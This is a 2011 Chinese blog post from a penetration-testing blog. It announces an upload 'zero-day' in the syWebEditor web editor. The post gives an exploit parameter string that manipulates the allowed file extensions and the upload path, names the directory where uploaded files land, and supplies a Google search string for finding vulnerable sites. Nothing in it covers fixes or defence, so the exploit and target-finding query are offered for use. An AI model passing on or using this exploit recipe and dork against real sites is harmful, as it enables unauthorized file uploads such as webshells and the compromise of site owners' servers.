syWebEditor编辑器最新0day-oma-ChinaUnix博客

Chinaunix首页 | 论坛 | 博客

首页　| 　博文目录　| 　关于我

博客访问： 2914429
博文数量： 181
博客积分： 9990
博客等级：中将
技术积分： 1865
用户组：普通用户
注册时间： 2006-05-23 09:43

文章分类

全部博文（181）

cms（2）

phpcms（2）
好友专区（1）
oracle专题（2）
windows（5）
渗透技巧总结（34）

linux（4）
渗透工具（25）
webshell（2）
asp专题（36）
aspx专题（2）
php专题（41）
免杀专题（1）
提权相关（2）
asp木马（1）
休闲心情（10）
其它（17）
未分配的博文（0）

文章存档

2011年（40）

2010年（17）

2009年（87）

2008年（37）

我的朋友

最近访客

推荐博文

相关博文

syWebEditor编辑器最新0day

分类：网络与安全

2011-04-06 21:46:21

syWebEditor编辑器存在上传漏洞，也是解析的问题，跟其它出现这漏洞的

编辑器一样。

exp:

%7Cjpg%7Cpng%7C&filePathType=1&filePath=/PhotoFile/ProFile/

上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。

谷歌一下：inurl:syWebEditor

阅读(996) | 评论(0) | 转发(0) |

0

上一篇：spidaNews V.1.0 注入漏洞及修复(news.php)

下一篇：WordPress自定义页面插件远程包含漏洞

给主人留下些什么吧！~~

关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们